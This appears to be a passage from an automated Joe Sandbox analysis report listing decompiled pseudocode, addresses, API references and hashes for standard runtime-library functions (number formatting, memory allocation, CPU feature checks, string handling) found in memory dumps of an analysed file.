COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00430771(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00430063(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0043014A(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00430684(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004305C3(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00430776
0x0043077c
0x004307ef
0x00000000
0x00430783
0x00430783
0x00430786
0x004307a1
0x004307a4
0x004307c4
0x004307d6
0x004307a6
0x004307a6
0x004307a9
0x00000000
0x004307ab
0x004307bd
0x004307bd
0x004307a9
0x004307f4
0x004307f8
0x00430788
0x004307a0
0x004307a0
0x00430786

APIs

__cftof_l.LIBCMT ref: 00430797

Part of subcall function 004305C3: __fltout2.LIBCMT ref: 004305EE

__cftog_l.LIBCMT ref: 004307BD
__cftoe_l.LIBCMT ref: 004307EF

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: b3414e2c58c0af54bd8905e92a2393d6cd7da50960238ca869a6e348c31ccb0f
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: D1116D3200004AFBCF125E84CC618EE3F62BB1C354F599616FA1858530D73AD9B2AF89

Uniqueness

Uniqueness Score: -1.00%

Function 00E8235E Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E8235E(signed int __edx, int _a4) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t54;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t83;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				signed int _t90;
				intOrPtr* _t94;
				signed int _t100;
				signed int _t106;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t120;
				void* _t122;
				void* _t123;
				void* _t125;

				_t106 = __edx;
				while(1) {
					_t54 = malloc(_a4);
					if(_t54 != 0) {
						return _t54;
					}
					_push(_a4);
					L00E82FCA();
					if(_t54 == 0) {
						if(_a4 != 0xffffffff) {
							_push(_t122);
							_t122 = _t125;
							_t125 = _t125 - 0xc;
							E00E82980( &_v20);
							_push(0xe8486c);
							_push( &_v20);
							L00E82FA6();
							asm("int3");
						}
						_push(_t122);
						_t123 = _t125;
						E00E81180( &_v20);
						_push(0xe848d0);
						_push( &_v20);
						L00E82FA6();
						asm("int3");
						_push(_t123);
						 *0xecf1e4 =  *0xecf1e4 & 0x00000000;
						 *0xe8600c =  *0xe8600c | 0x00000001;
						if(IsProcessorFeaturePresent(0xa) != 0) {
							_v28 = _v28 & 0x00000000;
							_push(_t86);
							_t109 =  &_v48;
							asm("cpuid");
							_t87 = _t86;
							 *_t109 = 0;
							 *((intOrPtr*)(_t109 + 4)) = _t86;
							 *((intOrPtr*)(_t109 + 8)) = 0;
							 *(_t109 + 0xc) = _t106;
							_v24 = _v48;
							_v16 = _v36 ^ 0x49656e69;
							_v20 = _v40 ^ 0x6c65746e;
							_push(_t87);
							asm("cpuid");
							_t89 =  &_v48;
							 *_t89 = 1;
							 *((intOrPtr*)(_t89 + 4)) = _t87;
							 *((intOrPtr*)(_t89 + 8)) = 0;
							 *(_t89 + 0xc) = _t106;
							if((_v16 | _v20 | _v44 ^ 0x756e6547) != 0) {
								L17:
								_t112 =  *0xecf1e8;
							} else {
								_t83 = _v48 & 0x0fff3ff0;
								if(_t83 == 0x106c0 || _t83 == 0x20660 || _t83 == 0x20670 || _t83 == 0x30650 || _t83 == 0x30660 || _t83 == 0x30670) {
									_t112 =  *0xecf1e8 | 0x00000001;
									 *0xecf1e8 = _t112;
								} else {
									goto L17;
								}
							}
							_t100 = _v40;
							_t70 = 7;
							_v16 = _t100;
							if(_v24 < _t70) {
								_t90 = _v28;
							} else {
								_push(_t89);
								asm("cpuid");
								_t94 =  &_v48;
								 *_t94 = _t70;
								 *((intOrPtr*)(_t94 + 4)) = _t89;
								 *((intOrPtr*)(_t94 + 8)) = 0;
								_t100 = _v16;
								 *(_t94 + 0xc) = _t106;
								_t90 = _v44;
								if((_t90 & 0x00000200) != 0) {
									 *0xecf1e8 = _t112 | 0x00000002;
								}
							}
							_t71 =  *0xe8600c; // 0x1
							_t72 = _t71 | 0x00000002;
							 *0xecf1e4 = 1;
							 *0xe8600c = _t72;
							if((_t100 & 0x00100000) != 0) {
								_t73 = _t72 | 0x00000004;
								 *0xecf1e4 = 2;
								 *0xe8600c = _t73;
								if((_t100 & 0x08000000) != 0 && (_t100 & 0x10000000) != 0) {
									asm("xgetbv");
									_v32 = _t73;
									_v28 = _t106;
									_t120 = 6;
									if((_v32 & _t120) == _t120) {
										_t76 =  *0xe8600c; // 0x1
										_t77 = _t76 | 0x00000008;
										 *0xecf1e4 = 3;
										 *0xe8600c = _t77;
										if((_t90 & 0x00000020) != 0) {
											 *0xecf1e4 = 5;
											 *0xe8600c = _t77 | 0x00000020;
											if((_t90 & 0xd0030000) == 0xd0030000 && (_v32 & 0x000000e0) == 0xe0) {
												 *0xe8600c =  *0xe8600c | 0x00000040;
												 *0xecf1e4 = _t120;
											}
										}
									}
								}
							}
						}
						return 0;
					} else {
						continue;
					}
					break;
				}
			}

0x00e8235e
0x00e82370
0x00e82373
0x00e8237b
0x00e8237e
0x00e8237e
0x00e82363
0x00e82366
0x00e8236e
0x00e82383
0x00e82998
0x00e82999
0x00e8299b
0x00e829a1
0x00e829a6
0x00e829ae
0x00e829af
0x00e829b4
0x00e829b4
0x00e829b5
0x00e829b6
0x00e829be
0x00e829c3
0x00e829cb
0x00e829cc
0x00e829d1
0x00e829d2
0x00e829d5
0x00e829df
0x00e829f0
0x00e829f6
0x00e829fc
0x00e82a01
0x00e82a05
0x00e82a09
0x00e82a0b
0x00e82a0d
0x00e82a10
0x00e82a15
0x00e82a1e
0x00e82a2f
0x00e82a3a
0x00e82a40
0x00e82a41
0x00e82a47
0x00e82a4a
0x00e82a54
0x00e82a57
0x00e82a5a
0x00e82a5d
0x00e82aa2
0x00e82aa2
0x00e82a5f
0x00e82a62
0x00e82a6c
0x00e82a97
0x00e82a9a
0x00000000
0x00000000
0x00000000
0x00e82a6c
0x00e82aa8
0x00e82aad
0x00e82aae
0x00e82ab4
0x00e82ae6
0x00e82ab6
0x00e82ab8
0x00e82ab9
0x00e82abf
0x00e82ac2
0x00e82ac4
0x00e82ac7
0x00e82aca
0x00e82acd
0x00e82ad0
0x00e82ad9
0x00e82ade
0x00e82ade
0x00e82ad9
0x00e82ae9
0x00e82aee
0x00e82af1
0x00e82afb
0x00e82b06
0x00e82b0c
0x00e82b0f
0x00e82b19
0x00e82b24
0x00e82b30
0x00e82b33
0x00e82b36
0x00e82b41
0x00e82b46
0x00e82b48
0x00e82b4d
0x00e82b50
0x00e82b5a
0x00e82b62
0x00e82b67
0x00e82b71
0x00e82b7f
0x00e82b92
0x00e82b99
0x00e82b99
0x00e82b7f
0x00e82b62
0x00e82b46
0x00e82b24
0x00e82ba1
0x00e82ba5
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8236e

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E81246,00000023,00E822E2,00E81E70,00E81E9E,?,?,?,?,?), ref: 00E82366
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E81246,00000023,00E822E2,00E81E70,00E81E9E,?,?,?,?,?), ref: 00E82373
_CxxThrowException.VCRUNTIME140(?,00E8486C), ref: 00E829AF
_CxxThrowException.VCRUNTIME140(?,00E848D0), ref: 00E829CC

Memory Dump Source

Source File: 00000002.00000002.245596346.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.245586506.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245602228.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245613917.0000000000E86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_file.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID:
API String ID: 4113974480-0
Opcode ID: a87f84aea35e85ebb2af59b41adedc292404565f21640f5e9abe525f2df4e3f4
Instruction ID: c0410bd58ef8000f4d7b90e9b79034ebb7f2a4ab4b489d48d6830d4c403d7732
Opcode Fuzzy Hash: a87f84aea35e85ebb2af59b41adedc292404565f21640f5e9abe525f2df4e3f4
Instruction Fuzzy Hash: 52F09A3090030EB68F04BAA4EC1AA9C73BCAA00714F10626DFB2DB14D1EB70A655C390

Uniqueness

Uniqueness Score: -1.00%

Function 00E82E39 Relevance: 6.0, APIs: 4, Instructions: 25
timethreadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00E82E39() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				GetSystemTimeAsFileTime( &_v16);
				_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
				_v8 = _v8 ^ GetCurrentThreadId();
				_v8 = _v8 ^ GetCurrentProcessId();
				QueryPerformanceCounter( &_v24);
				return _v20 ^ _v24.LowPart ^ _v8 ^  &_v8;
			}

0x00e82e3f
0x00e82e46
0x00e82e4b
0x00e82e57
0x00e82e60
0x00e82e69
0x00e82e70
0x00e82e85

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E82E4B
GetCurrentThreadId.KERNEL32 ref: 00E82E5A
GetCurrentProcessId.KERNEL32 ref: 00E82E63
QueryPerformanceCounter.KERNEL32(?), ref: 00E82E70

Memory Dump Source

Source File: 00000002.00000002.245596346.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.245586506.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245602228.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245613917.0000000000E86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.245696548.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_file.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 8ffb0957596ba439a97ef60ec9f47646dc2e9f89332eace44abecbe90f80e337
Instruction ID: 6cb382b7c56ec5c066727c8535253db51bfe8419cf99845c0e24476e5d7c62d0
Opcode Fuzzy Hash: 8ffb0957596ba439a97ef60ec9f47646dc2e9f89332eace44abecbe90f80e337
Instruction Fuzzy Hash: 45F05FB5C1020DEFCB00DBF5DA49A9EBBF8EF18205F6248959516F7150E738AB089B52

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040AA82(signed int __eax, void* __ecx, void* __eflags, char* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t35;
				signed int _t37;
				signed int _t38;
				signed int _t39;
				signed int _t47;
				signed int _t48;
				void* _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t53;
				void* _t55;
				signed int _t56;
				intOrPtr _t63;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				char* _t77;
				void* _t79;

				_v12 = _v12 & 0x00000000;
				_push(_t71);
				_t58 = " \n\r\t";
				_t76 = __eax;
				_v12 = E004201E0(" \n\r\t");
				_t35 =  *(_t76 + 0x10);
				if(_t35 == 0) {
					L10:
					_v12 = _v12 | 0xffffffff;
					L11:
					_v8 = E004201E0(_t58);
					_t37 =  *(_t76 + 0x10);
					if(_t37 == 0) {
						L33:
						_t72 = _t71 | 0xffffffff;
						__eflags = _t72;
						L34:
						_t68 = _v12;
						_t63 =  *((intOrPtr*)(_t76 + 0x14));
						if(_t68 != 0xffffffff) {
							__eflags = _t63 - 0x10;
							if(_t63 < 0x10) {
								_t38 = _t76;
							} else {
								_t38 =  *_t76;
							}
							_t39 = _t38 + _t68;
							__eflags = _t39;
						} else {
							if(_t63 < 0x10) {
								_t39 = _t76;
							} else {
								_t39 =  *_t76;
							}
						}
						_v12 = _t39;
						_t69 = _v12;
						if(_t72 != 0xffffffff) {
							__eflags = _t63 - 0x10;
							if(__eflags >= 0) {
								_t76 =  *_t76;
							}
							_v12 = _t76 + _t72 + 1;
						} else {
							if(_t63 < 0x10) {
								_t47 = _t76;
							} else {
								_t47 =  *_t76;
							}
							_v12 =  *(_t76 + 0x10) + _t47;
						}
						_t77 = _a4;
						 *(_t77 + 0x10) =  *(_t77 + 0x10) & 0x00000000;
						_t43 = _v12;
						 *((intOrPtr*)(_t77 + 0x14)) = 0xf;
						 *_t77 = 0;
						if(_t69 != _v12) {
							E00404AAA(_t77, _t43 - _t69, _t69, _t43 - _t69);
						}
						return _t77;
					}
					if(_t37 <= 0xffffffff) {
						_t48 = _t37 - 1;
						__eflags = _t48;
					} else {
						_t48 = _t37 | 0xffffffff;
					}
					if( *((intOrPtr*)(_t76 + 0x14)) < 0x10) {
						_t74 = _t76;
					} else {
						_t74 =  *_t76;
					}
					_t71 = _t74 + _t48;
					while(1) {
						_t50 = E00421E20(_t58,  *_t71, _v8);
						_t79 = _t79 + 0xc;
						if(_t50 == 0) {
							break;
						}
						__eflags =  *((intOrPtr*)(_t76 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t76 + 0x14)) < 0x10) {
							_t51 = _t76;
						} else {
							_t51 =  *_t76;
						}
						__eflags = _t71 - _t51;
						if(_t71 == _t51) {
							goto L33;
						} else {
							_t71 = _t71 - 1;
							__eflags = _t71;
							continue;
						}
					}
					if( *((intOrPtr*)(_t76 + 0x14)) < 0x10) {
						_t52 = _t76;
					} else {
						_t52 =  *_t76;
					}
					_t72 = _t71 - _t52;
					goto L34;
				}
				_t70 =  *((intOrPtr*)(_t76 + 0x14));
				if(_t70 < 0x10) {
					_t67 = _t76;
				} else {
					_t67 =  *_t76;
				}
				_t53 = _t35 + _t67;
				_v8 = _t53;
				if(_t70 < 0x10) {
					_t71 = _t76;
				} else {
					_t71 =  *_t76;
				}
				if(_t71 >= _t53) {
					goto L10;
				} else {
					while(1) {
						_t55 = E00421E20(_t58,  *_t71, _v12);
						_t79 = _t79 + 0xc;
						if(_t55 == 0) {
							break;
						}
						_t71 = _t71 + 1;
						if(_t71 < _v8) {
							continue;
						}
						goto L10;
					}
					__eflags =  *((intOrPtr*)(_t76 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t76 + 0x14)) < 0x10) {
						_t56 = _t76;
					} else {
						_t56 =  *_t76;
					}
					_t71 = _t71 - _t56;
					_v12 = _t71;
					goto L11;
				}
			}

0x0040aa87
0x0040aa8d
0x0040aa8e
0x0040aa94
0x0040aa9b
0x0040aa9e
0x0040aaa4
0x0040aae2
0x0040aae2
0x0040aae6
0x0040aaec
0x0040aaef
0x0040aaf5
0x0040ab5a
0x0040ab5a
0x0040ab5a
0x0040ab5d
0x0040ab5d
0x0040ab60
0x0040ab66
0x0040ab75
0x0040ab78
0x0040ab7e
0x0040ab7a
0x0040ab7a
0x0040ab7a
0x0040ab80
0x0040ab80
0x0040ab68
0x0040ab6b
0x0040ab71
0x0040ab6d
0x0040ab6d
0x0040ab6d
0x0040ab6b
0x0040ab82
0x0040ab88
0x0040ab8d
0x0040aba4
0x0040aba7
0x0040aba9
0x0040aba9
0x0040abaf
0x0040ab8f
0x0040ab92
0x0040ab98
0x0040ab94
0x0040ab94
0x0040ab94
0x0040ab9f
0x0040ab9f
0x0040abb2
0x0040abb5
0x0040abbc
0x0040abbe
0x0040abc5
0x0040abca
0x0040abd2
0x0040abd2
0x0040abdd
0x0040abdd
0x0040aafa
0x0040ab14
0x0040ab14
0x0040aafc
0x0040aafc
0x0040aafc
0x0040ab19
0x0040ab1f
0x0040ab1b
0x0040ab1b
0x0040ab1b
0x0040ab21
0x0040ab36
0x0040ab3e
0x0040ab43
0x0040ab48
0x00000000
0x00000000
0x0040ab25
0x0040ab29
0x0040ab2f
0x0040ab2b
0x0040ab2b
0x0040ab2b
0x0040ab31
0x0040ab33
0x00000000
0x0040ab35
0x0040ab35
0x0040ab35
0x00000000
0x0040ab35
0x0040ab33
0x0040ab4e
0x0040ab54
0x0040ab50
0x0040ab50
0x0040ab50
0x0040ab56
0x00000000
0x0040ab56
0x0040aaa6
0x0040aaac
0x0040aab2
0x0040aaae
0x0040aaae
0x0040aaae
0x0040aab4
0x0040aab6
0x0040aabc
0x0040aac2
0x0040aabe
0x0040aabe
0x0040aabe
0x0040aac6
0x00000000
0x0040aac8
0x0040aac8
0x0040aad0
0x0040aad5
0x0040aada
0x00000000
0x00000000
0x0040aadc
0x0040aae0
0x00000000
0x00000000
0x00000000
0x0040aae0
0x0040ab01
0x0040ab05
0x0040ab0b
0x0040ab07
0x0040ab07
0x0040ab07
0x0040ab0d
0x0040ab0f
0x00000000
0x0040ab0f

APIs

_strlen.LIBCMT ref: 0040AA96
_strlen.LIBCMT ref: 0040AAE7

Strings

, xrefs: 0040AA8E, 0040AA93, 0040AACF, 0040AAE6, 0040AB3D

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-1083388701
Opcode ID: 5e23143341e56eb8006d6ef9feb0fdba4514c80c96ea19e54ec28c1cb3ad0c88
Instruction ID: c5d3d723550e3489fc534331f353673afed0f3948e057ebe6764db3629f1b488
Opcode Fuzzy Hash: 5e23143341e56eb8006d6ef9feb0fdba4514c80c96ea19e54ec28c1cb3ad0c88
Instruction Fuzzy Hash: 50417E317007009BDB24CE2C898466EB7F7EB45364B240A3BD5A2A72D1D738A995CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004164F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004164F9(void* __ebx, signed int* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t35;
				signed int _t38;
				signed int _t41;
				signed int* _t49;
				signed int _t51;
				signed int _t54;
				signed int _t59;
				signed int _t60;
				signed int _t65;
				void* _t69;

				_t58 = __edi;
				_push(0x14);
				E00423643(E00433699, __ebx, __edi, __esi);
				_t49 = __ecx;
				_t65 =  *(_t69 + 8);
				if(_t65 > 0x9249249) {
					E0041EBA3("vector<T> too long");
				}
				_t35 = _t49[2] -  *_t49;
				asm("cdq");
				_t51 = 0x1c;
				_t36 = _t35 / _t51;
				_t74 = _t35 / _t51 - _t65;
				if(_t35 / _t51 < _t65) {
					_t38 = E004165CC(_t65, _t58, _t65);
					 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
					_push( *(_t69 + 8));
					 *(_t69 - 0x18) = _t38;
					_push( *(_t69 - 0x18));
					_push(_t49[1]);
					E00416985(_t49,  *_t49, _t74);
					_t41 = _t49[1];
					_t54 =  *_t49;
					 *(_t69 - 0x1c) = _t41;
					asm("cdq");
					_t59 = 0x1c;
					_t60 = (_t41 - _t54) / _t59;
					 *(_t69 - 0x20) = _t60;
					if(_t54 != 0) {
						 *(_t69 - 0x14) = _t54;
						if(_t54 !=  *(_t69 - 0x1c)) {
							while(1) {
								E0040CE40(0, _t54, 1);
								 *(_t69 - 0x14) =  *(_t69 - 0x14) + 0x1c;
								if( *(_t69 - 0x14) ==  *(_t69 - 0x1c)) {
									break;
								}
								_t54 =  *(_t69 - 0x14);
							}
							_t65 =  *(_t69 + 8);
							_t60 =  *(_t69 - 0x20);
						}
						_push( *_t49);
						E0042040B();
					}
					_t36 =  *(_t69 - 0x18);
					_t49[2] = _t65 * 0x1c + _t36;
					_t49[1] = _t60 * 0x1c + _t36;
					 *_t49 = _t36;
				}
				return E004236AF(_t36);
			}

0x004164f9
0x004164f9
0x00416500
0x00416505
0x00416507
0x00416510
0x00416517
0x00416517
0x0041651f
0x00416523
0x00416524
0x00416525
0x00416527
0x00416529
0x00416531
0x00416536
0x0041653a
0x0041653f
0x00416545
0x00416548
0x00416549
0x0041654e
0x00416551
0x00416556
0x0041655d
0x0041655e
0x00416561
0x00416563
0x00416568
0x0041656a
0x00416570
0x00416577
0x0041657d
0x00416582
0x0041658c
0x00000000
0x00000000
0x00416574
0x00416574
0x0041658e
0x00416591
0x00416591
0x00416594
0x00416596
0x0041659b
0x0041659c
0x004165a9
0x004165ac
0x004165af
0x004165af
0x004165b6

APIs

__EH_prolog3_catch.LIBCMT ref: 00416500
std::_Xinvalid_argument.LIBCPMT ref: 00416517

Part of subcall function 0041EBA3: std::exception::exception.LIBCMT ref: 0041EBB8
Part of subcall function 0041EBA3: __CxxThrowException@8.LIBCMT ref: 0041EBCD
Part of subcall function 0041EBA3: std::exception::exception.LIBCMT ref: 0041EBDE

Strings

vector<T> too long, xrefs: 00416512

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1877048013-3788999226
Opcode ID: f263cfd1661bebc5498e243e9c42ea2591545823f9fbf2e473508b47f157879b
Instruction ID: db4b2b0598382a1ce13c76931b4a7250dbb0fe3ca9cc1dac68939890fa84db9e
Opcode Fuzzy Hash: f263cfd1661bebc5498e243e9c42ea2591545823f9fbf2e473508b47f157879b
Instruction Fuzzy Hash: 8E21C272E00218DFCF04DFA9D481AADBBB2AF44300F16405AE504AF345C679ED80CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404B1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00404B1F(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				intOrPtr _t13;
				intOrPtr* _t17;
				intOrPtr* _t20;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t23 = _a4;
				_t2 = _t23 + 0x10; // 0xcec81ec
				_t13 =  *_t2;
				_t34 = __ecx;
				_t25 = _a8;
				if(_t13 < _t25) {
					_t13 = E0041EBF0("invalid string position");
				}
				_t31 = _t13 - _t25;
				if(_a12 < _t31) {
					_t31 = _a12;
				}
				if(_t34 != _t23) {
					if(E00404BB8(_t23, _t34, _t31, _t31, 0) != 0) {
						if( *((intOrPtr*)(_t23 + 0x14)) < 0x10) {
							_t17 = _t23;
						} else {
							_t17 =  *_t23;
						}
						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
							_t27 = _t34;
						} else {
							_t27 =  *_t34;
						}
						E0041F8C0(_t27, _t17 + _a8, _t31);
						 *((intOrPtr*)(_t34 + 0x10)) = _t31;
						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
							_t20 = _t34;
						} else {
							_t20 =  *_t34;
						}
						 *((char*)(_t20 + _t31)) = 0;
					}
				} else {
					E00404C57(_t34, _t31 + _t25, 0xffffffff);
					E00404C57(_t34, 0, _a8);
				}
				return _t34;
			}

0x00404b23
0x00404b26
0x00404b26
0x00404b2a
0x00404b2c
0x00404b32
0x00404b39
0x00404b39
0x00404b40
0x00404b45
0x00404b47
0x00404b47
0x00404b4c
0x00404b74
0x00404b7a
0x00404b80
0x00404b7c
0x00404b7c
0x00404b7c
0x00404b86
0x00404b8c
0x00404b88
0x00404b88
0x00404b88
0x00404b94
0x00404ba0
0x00404ba3
0x00404ba9
0x00404ba5
0x00404ba5
0x00404ba5
0x00404bab
0x00404bab
0x00404b4e
0x00404b55
0x00404b61
0x00404b61
0x00404bb5

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404B39

Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC05
Part of subcall function 0041EBF0: __CxxThrowException@8.LIBCMT ref: 0041EC1A
Part of subcall function 0041EBF0: std::exception::exception.LIBCMT ref: 0041EC2B

Part of subcall function 00404BB8: std::_Xinvalid_argument.LIBCPMT ref: 00404BC9

_memmove.LIBCMT ref: 00404B94

Strings

invalid string position, xrefs: 00404B34

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: 5cfee18453701e6643d013169e60b7cd9137d006298254fe828ee16445ae85bd
Instruction ID: 5b2a5d6a0f7ea28d6ddcd86d54f6157dbbaeae6e195af66833f429b6c29573ef
Opcode Fuzzy Hash: 5cfee18453701e6643d013169e60b7cd9137d006298254fe828ee16445ae85bd
Instruction Fuzzy Hash: 4E11C4B13042109BCB24AE199881B6AB3B9EBC5724F10053FFA52AB2C1C778F941C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CFD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CFD5(signed int __eax, void* __ebx, void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t13;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void* _t22;
				signed int _t23;
				intOrPtr _t30;
				intOrPtr* _t32;

				_t22 = __ebx;
				_t29 = _a4;
				_t32 = __eax;
				_t23 = __eax;
				if(E00404C1C(__eax, _a4) == 0) {
					_t13 =  *((intOrPtr*)(_t32 + 0x10));
					if((_t23 | 0xffffffff) - _t13 <= __ebx) {
						_t13 = E0041EBA3("string too long");
					}
					if(_t22 != 0) {
						_t30 = _t13 + _t22;
						if(E00404BB8(_t22, _t32, _t30, _t30, 0) != 0) {
							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
								_t16 = _t32;
							} else {
								_t16 =  *_t32;
							}
							E0041F8C0( *((intOrPtr*)(_t32 + 0x10)) + _t16, _a4, _t22);
							 *((intOrPtr*)(_t32 + 0x10)) = _t30;
							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
								_t18 = _t32;
							} else {
								_t18 =  *_t32;
							}
							 *((char*)(_t18 + _t30)) = 0;
						}
					}
					return _t32;
				}
				if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
					_t19 = _t32;
				} else {
					_t19 =  *_t32;
				}
				return E00404EB7(_t22, _t23, _t32, _t32, _t29 - _t19);
			}

0x0040cfd5
0x0040cfda
0x0040cfdd
0x0040cfe0
0x0040cfe9
0x0040d004
0x0040d00e
0x0040d015
0x0040d015
0x0040d01c
0x0040d01e
0x0040d02d
0x0040d033
0x0040d039
0x0040d035
0x0040d035
0x0040d035
0x0040d045
0x0040d051
0x0040d054
0x0040d05a
0x0040d056
0x0040d056
0x0040d056
0x0040d05c
0x0040d05c
0x0040d02d
0x00000000
0x0040d060
0x0040cfef
0x0040cff5
0x0040cff1
0x0040cff1
0x0040cff1
0x00000000

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040D015
_memmove.LIBCMT ref: 0040D045

Strings

string too long, xrefs: 0040D010

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

